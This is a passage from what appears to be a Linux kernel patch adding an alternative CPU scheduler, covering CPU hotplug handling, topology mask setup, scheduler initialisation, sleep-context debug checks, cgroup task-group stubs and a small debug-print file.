++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but it is
++ * only effective while the CPU is going down.
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task,
++	 * which is a per-CPU kthread (kthread_is_per_cpu()) and will push
++	 * this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
++ * Invoked from a CPUs hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do sync before parking smpboot threads to take care of the RCU boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do its job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
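++
++/*
++ * Illustrative walk-through of the macro above: starting from the
++ * complement of cpumask_of(cpu), each TOPOLOGY_CPUMASK() step that
++ * still intersects the working mask records that level's full mask
++ * (smt -> coregroup -> core -> others) in sched_cpu_topo_masks[] and
++ * then excludes it from the working mask, so the per-CPU array is
++ * ordered from nearest to farthest CPUs.
++ */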
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take the chance to reset the time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in the system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_rq_watermark + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->watermark = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPUs synchronised, and interrupts disabled. The
++ * caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs to complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..7c1cc0cbca0d
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,660 @@
